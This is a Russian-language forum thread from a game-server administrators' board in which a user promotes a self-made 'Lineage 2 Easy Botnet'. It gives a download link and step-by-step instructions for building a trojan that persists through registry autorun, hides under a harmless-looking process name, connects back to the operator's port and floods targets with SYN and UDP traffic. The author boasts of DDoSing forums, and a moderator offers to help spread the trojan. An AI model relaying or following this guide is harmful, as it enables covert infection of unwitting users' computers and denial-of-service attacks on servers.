Перейти к содержимому

Welcome to 100NT форум администраторов игровых серверов
Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. If you already have an account, login here - otherwise create an account for free today!

Переключатель чата Чат

Добро пожаловать в чат 100NT
xisp : (21 May 2012 - 11:55 AM) и еще 1 вопрос! В Каком файле в клиенте менять надпись которая в самом начале написана под окошком для ввода логин и пароля?
xisp : (21 May 2012 - 11:40 AM) Кто может поделиться чстой папкой system interlude? А то пол инета облазил, то л2ини неоткрывается то русский текст неподдерживает
Horus : (17 May 2012 - 01:17 PM) гуф умер, а форум отжил свое.
Inkognit0 : (17 May 2012 - 01:08 PM) форум умер?
Изменить размер окна сообщений

Война Против Гфш - Или Lineage 2 Noobish Botnet

- - - - -

Сообщений в теме: 16

L2Weapon

Пользователь

• Пользователи
  • 10 сообщений
Вот вам нормальное описание чтобы с пастбина не читать

:D

Всем привет,моё имя "Pain" и я очень давно не играл в Lineage 2 . Раньше я был постоянным игроком и был доволен теми временами.

Недавно я решил вернуться в мир линейки ненадолго и был в ужасе. Посетив L2Top.ru я увидел Тысячи Серверов которые открываются и Тысячи серверов которые Вот-Вот закроются.

Ненужные ГФШ то и дело Пускали рекламу. Через месяц бездарные админы школьники сразу прикрывали свои проекты. На всех форумах открываются темы с нытьём из за однодневных серверов.

И вот Мне в Голову пришёл коварный план. План по уничтожению ГФШ.

Использовав свои знания я решил Написать программу для уничтожения ГФШ, Точнее "Клиентский Ботнет" Который лёгок по управлению и которым может овладеть даже самый ТУПОЙ школьник.

Взял я в руки Delphi 7 и включил Мозг. Прошло некоторое время и вот что из этого вышло -

Проект "Lineage 2 Easy Botnet" или Оружие для Толпы по уничтожению ГФШ.

Наверное вам интересно каков же принцип работы программы? Почему она так легка в управлении и почему каждый Нуб сможет ею пользоваться?

Я отвечу на ваши вопросы.

Принцип работы программы : Программа имеет свой клиент (Lineage 2 botnet.exe) и Cтаб (Stub.exe)

Программа работает методом Client >>> Server (Connection через Sockets)

Вы открываете программу Lineage 2 botnet.exe и через меню "Создать сервер" Делаете Вредоносный Троян (Код берётся через stub.exe для генерирования трояна!)

После чего требуется лишь открыть свой порт (Любой но рекомендую 3085) и распостранять вирус по интернету. Все люди которые Откроют Троян сгенерированный через LINEAGE 2 EASY BOTNET Станут зомби и будут подключаться на ваш IP(DNS)/Port (Который вы откроете)

И сидя на определённом открытом порту слушать ваших команд .

Свойства : После создания трояна который вы расостраняете он при включении садится в Реестр Жертвы и добавляется в автозапуск! Тоесть после перезагрузки компьютера жертвы она всё ещё ваш БОТ! До тех пор пока не сотрёт ваш троян антивирусом или другим методом(Если поймёт в чём дело)

Ботнет имеет SSYN (Более мощный вид SYN Флуда) а также UDP Флуд.

Вы можете выбрать уровень Силы Флуда через поле "Левел" - High самый сильный. Vslow- самый низкий уровень флуда.

C помощью распостранения данной программы я планирую уничтожить большую часть ГФШ и Освободить мир от админов школьников.

Именно для этого и делался Lineage 2 botnet , максимально лёгок в использовании!

Инструкция по установке :

Первым делом через модем/роутер открываем порт - Можно открыть любой но я рекомендую 3085 для корректной работы ботов.

После чего идём в папку с Lineage 2 botnet.exe и открываем саму программу.

В верхнем меню выбираем пункт - Создаём сервер и клацаем на него. После того как вы клацнет на "Создать сервер" появится отдельное окошко в котором вы увидите

"Создатель трояна"

Там расположено несколько полей для создания вашего будующего трояна для распостранения

Сейчас я обьясню как это делается.

В первом поле DNS указываем наш IP/No-ip(Dns host) куда будут стучаться зомби

Во втором поле port указываем порт который мы открыли (На который будут коннектится зомби) Желательно 3085!!

В третьем поле ID указываем имя (Любое) которое будет у ботов после подключения (К примеру " Bots" "Zombies " "lols"

В четвёртом поле Reg Key можете ничего не менять (Ключ для реестра) и оставить его таким как есть (Рекомендую)

В пятом поле startup.exe Можете поменять данные но лучше оставить так как есть (Стартовый .exe файл) который будет отображаться у жертвы после перезагрузки в диспетчере задач (Можете назвать его к примеру Systems.exe дабы жертва не заподозрила!)

После всего этого нажимаем кнопку Build Server и через 2 секунды в папке с ботнетом появится файлик

server.exe который и есть ваш троян (Должны его распостранить)

Теперь я приведу вам скриншоты своей работы -

1.Первый вид программы после включения

Изображение

2. Выбираем Порт для соединений

Изображение

3. Открываются сокеты и соединяются Боты

Изображение

4.Генератор вашего трояна выглядит так -

Изображение

Для проведения DDos атак на средние фришки будет достаточно 20-100 зомби и SSYN Флуда.

Данная программа ИДЕАЛЬНА для всех против ГФШ. С уважением Пейн.

Примечание насчёт Вирусов - Данная программа на 100% Чиста,Вы можете проверить файл Lineage 2 botnet .exe на любом антивирусном сайте или любым другим методом (Sandboxie,Vmware, и тд)

В архиве находящийся stub.exe палится антивирусами так как содержит Вредоносный код генерирующий ваш троян (stub.exe запускать не требуется,он должен лежать в папке с ботнетом для генерации трояна или будет выдавать ошибку ) Оттуда берётся код.

Если вы не верите мне просто не качайте.

Я буду обновлять программу каждый раз и бороться против ГФШ.

Качаем отсюда - mediafire.com/?f6cotndacrtz3ha

Сообщение отредактировал izac: 23 November 2011 - 22:37

Артёмка

Продвинутый пользователь

• Пользователи
  • 78 сообщений
и смысл был изобретать велосипед? если можно воспользоваться оптимой или гбот и тп? не качал но на 99% уверен что автор как раз таки с помощью этого только себе ботов собирает:D

L2Weapon

Пользователь

• Пользователи
  • 10 сообщений
У меня куча ботов через траффик. Почитай заголовок темы,ботнет не требует ничего кроме открытого порта в отличии от оптимы

который нубам не поставить.Моя цель - Доступность Ддоса нубам (для убийства ГФШ)

+ оптима говно унылое а не бот

мой и то лучше

KPzero

Продвинутый пользователь

• Пользователи
  • 127 сообщений
  • ГородСанкт-петербург
а я вот ради интереса распространю это и посмотрим :D Велосипед велосипедом, а вот ради интереса поубивать можно, а собственно почему бы и нет?)

Сообщение отредактировал KPzero: 23 November 2011 - 00:47

Артёмка

Продвинутый пользователь

• Пользователи
  • 78 сообщений
тебе не очково было запускать неведомую "хуйню" от человека с 0 постами?:D

L2Weapon

Пользователь

• Пользователи
  • 10 сообщений
Не очково так как ПРограмма полностью чиста, у меня Ботов через Эксплойты + Траффик Хватает с головой.

Stub.exe - стаб откуда берётся код для генерации БОта (Палится так как Бот после создания не криптован и тоже палится)

Сам ботнет l2 botnet.exe можете проверять везде,он чист как вода.

KPzero

Продвинутый пользователь

• Пользователи
  • 127 сообщений
  • ГородСанкт-петербург

Просмотр сообщенияАртёмка (23 November 2011 - 00:54) писал:

тебе не очково было запускать неведомую "хуйню" от человека с 0 постами? :D

У меня есть левый комп, где я проверяю всякую х из инета :) фаервол никто не отменял сразу видно куда и что лезет :club: так что не страшно

QustmeS

Продвинутый пользователь

• Пользователи
  • 633 сообщений
iptables + portknock и твой школнэт лесом
для спасиба есть +

L2Weapon

Пользователь

• Пользователи
  • 10 сообщений
Questmes, 5к ботов и твой iptables вместе с машиной лесом)

А данный софт выдерживает их свободно. + Пойдут обновления

вы все ахните)

izac

Продвинутый пользователь

• Модераторы
  • 854 сообщений
Если интересно отпиши в ваську придложу как быстро распростронить !

Просмотр сообщенияQustmeS (23 November 2011 - 18:30) писал:

iptables + portknock и твой школнэт лесом
школота некогда заниматса этим не будет , темболее какой линукс виндовс + комодо это максимум !

Сообщение отредактировал izac: 23 November 2011 - 22:39

Изображение
Изображение
Мы неустанны , непокорны и добьёмся своего !

Артёмка

Продвинутый пользователь

• Пользователи
  • 78 сообщений
во я что вспомнил то, автор темы я так понимаю то тело которого заовнили на зг? орал что он тру ддосер и положит все форумы по л2 , орал и 100нт убьешь и зг и ластим, чтот после твоего бана там я не заметил падений

L2Weapon

Пользователь

• Пользователи
  • 10 сообщений
Артёмка я убил и ЗГ

И 100нт на минут 20 чтобы показать свои возможности

теперь у меня другие планы и тупым ДДосом я не ограничиваюсь

Данный проект нужен мне для уничтожения хотябы малой части серверов в л2топру

затем вступаю в фазу 2

Кто кто а лучше школоты с моим оружием этого никто не сделает

План номер 2 (Главную цель) я пока раскрывать не буду.

Артёмка

Продвинутый пользователь

• Пользователи
  • 78 сообщений
окей..поживем увидим, но чтот тут не так:)

Fun

Продвинутый пользователь

• Пользователи
  • 309 сообщений
  • ГородЕкатеринбург
ааааааааааааахахахахахха, это АНОНИМУС С КСЛАТУ:D Стопудова :DDD он меня догоняет что бы я смеялся :DDDDD
Относись ко всем одинаково , пока не поймёшь что они идиоты.

L2Weapon

Пользователь

• Пользователи
  • 10 сообщений
Неадекват? я на КС-Л2 никогда не сидел

и вообще в л2 не играю и не занимаюсь серверами. :\

Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 скрытых пользователей